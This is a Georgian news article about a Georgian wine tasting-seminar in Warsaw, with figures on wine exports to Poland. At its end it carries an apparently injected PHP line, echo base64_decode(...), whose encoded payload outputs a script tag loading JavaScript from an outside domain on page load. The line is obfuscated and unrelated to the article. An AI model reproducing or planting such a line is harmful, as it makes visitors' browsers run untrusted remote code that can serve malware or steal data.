celsiusi
ავერსი საქკაბელი
ქართული ღვინის პოპულარიზაციისა და საექსპორტო ბაზრების დივერსიფიკაციის მიზნით, პოლონეთის დედაქალაქ ვარშავაში, ღვინის ეროვნული სააგენტოს მხარდაჭერით და სააგენტოს კონტრაქტორი მარკეტინგული კომპანიის  „Peope PR" ორგანიზებით, ქართული ღვინის დეგუსტაცია-სემინარი გაიმართა. ამის შესახებ, საინფორმაციო სააგენტო BUSINESS TIME-ს ღვინის ეროვნული სააგენტოდან აცნობეს. 
 
მათივე ცნობით, დეგუსტაცია-სემინარს, რომელსაც ცნობილი ღვინის ექსპერტი, სომელიე და ღვინის სკოლის დამფუძნებელი სიმონ მილონასი (Szymon Milonas) უძღვებოდა, ადგილობრივი მედიის, კომერციული სექტორისა და  პოლონეთის რესპუბლიკაში საქართველოს საელჩოს წარმომადგენლები დაესწრნენ.
 
ღონისძიების ფარგლებში, სტუმრებს შესაძლებლობა მიეცათ, გასცნობოდნენ ქართული სუფრის კულტურასა და ტრადიციებს. ღონისძიებაზე  ქართული ღვინის მწარმოებელი 6 კომპანიის ღვინოები და ქართული სამზარეულო იყო წარმოდგენილი.
 
"მიმდინარე წლის მაისში, ქართული ღვინის წარდგენა პოლონელი სომელიეების, ღვინის დისტრიბუტორებისა და ცნობილი რესტორნების წარმომადგენლებისთვისაც გაიმართა.
 
პოლონეთი ქართული ღვინის ერთ-ერთ სტრატეგიულ ბაზარს წარმოადგენს, რომელმაც ქართული ღვინის ექსპორტიორი ქვეყნების ხუთეულში სტაბილურად დაიმკვიდრა ადგილი. 2021 წელს, პოლონეთში ქართული ღვინის ექსპორტმა 7 მილიონ ბოთლს გადააჭარბა, ზრდამ, 2020 წელთან შედარებით, 34%-ს მიაღწია. ექსპორტი მზარდია მიმდინარე წელსაც; იანვარ-აპრილში ექსპორტირებულია 2,4 მლნ ბოთლი, ზრდა 30%-ს აღწევს."- აღნიშნავენ ღვინის ეროვნულ სააგენტოში. 
 
 
732
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");